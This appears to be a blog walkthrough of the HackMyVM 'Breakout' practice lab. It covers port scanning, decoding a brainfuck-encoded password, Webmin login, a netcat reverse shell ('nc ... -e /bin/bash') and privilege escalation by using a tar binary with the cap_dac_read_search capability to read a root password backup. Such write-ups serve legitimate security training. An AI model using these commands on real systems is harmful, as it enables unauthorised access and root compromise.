HackMyVm Breakout Walkthrough

HackMyVm Breakout Walkthrough

Key points: good enum


Scan ports.

 ~ nmap -sV -sC -p-  -Pn  -oN ports.log    
 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.                              
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-22 22:02 CST                                                              
 Nmap scan report for                            
 Host is up (0.0022s latency).                                  
 Not shown: 65530 closed ports                                  
 PORT      STATE SERVICE     VERSION                            
 80/tcp    open  http        Apache httpd 2.4.51 ((Debian))
 |_http-server-header: Apache/2.4.51 (Debian)                  
 |_http-title: Apache2 Debian Default Page: It works            
 139/tcp   open  netbios-ssn Samba smbd 4.6.2                  
 445/tcp   open  netbios-ssn Samba smbd 4.6.2                  
 10000/tcp open  http        MiniServ 1.981 (Webmin httpd)                                                                    
 |_http-title: 200 — Document follows                    
 20000/tcp open  http        MiniServ 1.830 (Webmin httpd)
 |_http-title: 200 — Document follows
 Host script results:                                          
 |_clock-skew: 7h59m58s                                        
 |_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | smb2-security-mode:                                          
 |   2.02:                                                      
 |_    Message signing enabled but not required                
 | smb2-time:                                                  
 |   date: 2021-10-22T22:03:10                                  
 |_  start_date: N/A                                            

Check source code of index.html at port 80.

 don't worry no one will get here, it's safe to share with you my access. Its encrypted :)

It's brainfuck code. Decode it online, get string ".2uqPEfj3D<P'a-3".

Use enum4linux to enum.

 ~ enum4linux | tee enum.log
 S-1-22-1-1000 Unix User\cyber (Local User)

With username cyber and password we decode from brainfuck code, we can login at port 20000.

In control panel, we found command shell.


Run "nc 1234 -e /bin/bash", we can get reverse shell.

 ~ nc -nlvp 1234                                                                                          fish-0 | 0 [22:47:24]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on
 Ncat: Connection from
 Ncat: Connection from
 uid=1000(cyber) gid=1000(cyber) groups=1000(cyber),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
 python3 -c 'import pty;pty.spawn("/bin/bash")'

Search cap.

 cyber@breakout:/$ getcap / -r 2>/dev/null
 getcap / -r 2>/dev/null
 /home/cyber/tar cap_dac_read_search=ep
 /usr/bin/ping cap_net_raw=ep

And we found password backup.

 cyber@breakout:/tmp$ ls -la /var/backups
 ls -la /var/backups
 total 12
 drwxr-xr-x  2 root root 4096 Oct 20 07:49 .
 drwxr-xr-x 14 root root 4096 Oct 19 13:48 ..
 -rw-------  1 root root   17 Oct 20 07:49 .old_pass.bak

We can compress it can extract it in /tmp folder using /home/cyber/tar.

 cyber@breakout:/tmp$ /home/cyber/tar -cvf pass.tar /var/backups
 /home/cyber/tar -cvf pass.tar /var/backups
 /home/cyber/tar: Removing leading `/' from member names
 cyber@breakout:/tmp$ tar -xvf pass.tar
 tar -xvf pass.tar
 cyber@breakout:/tmp$ cd var/backups
 cd var/backups
 cyber@breakout:/tmp/var/backups$ cat .old_pass.bak
 cat .old_pass.bak

Finally we get root.

 root@breakout:~# id;hostname
 uid=0(root) gid=0(root) groups=0(root)



«    2023年11月    »
  • 订阅本站的 RSS 2.0 新闻聚合

Powered By Z-BlogPHP 1.7.3